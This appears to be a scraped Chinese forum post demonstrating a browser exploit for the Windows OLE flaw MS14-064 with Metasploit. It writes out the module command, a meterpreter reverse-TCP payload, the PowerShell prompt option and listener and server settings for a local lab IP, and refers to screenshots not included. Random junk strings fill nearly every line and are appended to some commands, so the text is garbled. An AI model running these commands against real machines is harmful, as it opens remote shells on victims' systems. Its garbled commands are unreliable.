3 X d; D1 _- g7 f7 w
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
/ {4 ]# l# w9 E+ J4 {; Z
: S( ]3 I) L% p) s0 t
9 k/ G6 ~8 U- N# C 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
, }. z& \$ m% Q7 r8 p2 T, k/ u/ T
2 |: L4 `- s( ?% Z
+ E, A$ Q5 c# j! \( i `/ Y8 u 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp3 [3 \, o2 ?2 h
" i! ]" d$ i: S! |/ Z X2 z3 V( ?, o# w' ]$ L
set AllowPowershellPrompt true0 ~. s3 |, w W5 Q
3 i1 A5 U9 f" J. J3 j% z
; E+ B( } D* W7 I v0 g6 S# Z8 J2 J* i Set LHOST 192.168.0.109
; | n$ _ U, }$ Y6 ~ z
) o# h8 }6 @ K8 X7 p
6 J+ O, S' G# Z5 o+ K* q
set SRVHOST 192.168.0.109
+ [) t6 C: |# G5 x& q
- N- k9 { U9 [" B
9 C' p" c8 t3 k& h5 f, J) h Set uripath share
. P( ^. M6 V2 Y6 y) c+ q
5 g9 Y$ c0 W8 f1 v
9 C( p/ t1 S$ Y2 Z Set srvport 801 ]0 R! n/ o; n
6 }+ c( M1 T6 ~" J
( J- G7 u+ l9 s( \1 [9 e% a2 _
) v# J+ p% P/ ~/ X
8 Q, S4 i: z8 x6 w1 O7 K8 V+ V7 J' M( t" k# V& y; h7 ~7 T
: y& t4 J2 w( e7 \7 [: L
+ ^ R) `6 z% G P2 {
- s8 ]! f/ y, I9 t3 X i% H( c
; K! p: D" c9 Y& r
4 e: u2 _' i) @$ m: r( _- q5 M
0 m( {4 n9 M q
* Z; U. F3 U0 @: d9 J0 p6 e
' ~4 E; F# }' ?+ N' {* T
# y# E# i r$ m% l
3 {% c2 b0 _! q( U" a7 ]
0 R6 X: Y: r/ E8 {4 S 下面我们来访问本地地址如图:4 K: h8 q: E m3 {% y+ l1 [
; d5 r( n9 k4 K9 p5 ~# Y8 I9 E
! L+ h+ t* v q
+ ?* V9 A. f2 D! j: V7 `
' N% q1 Y. N s, O- D5 |
- h" H' e' Z, J8 o# ^% X: d) [+ o
: a3 ]# A3 b! R
+ p/ p1 P! w7 R1 v1 S7 J+ z7 m i& G) q* @
; I6 w8 }/ J/ n' X1 ]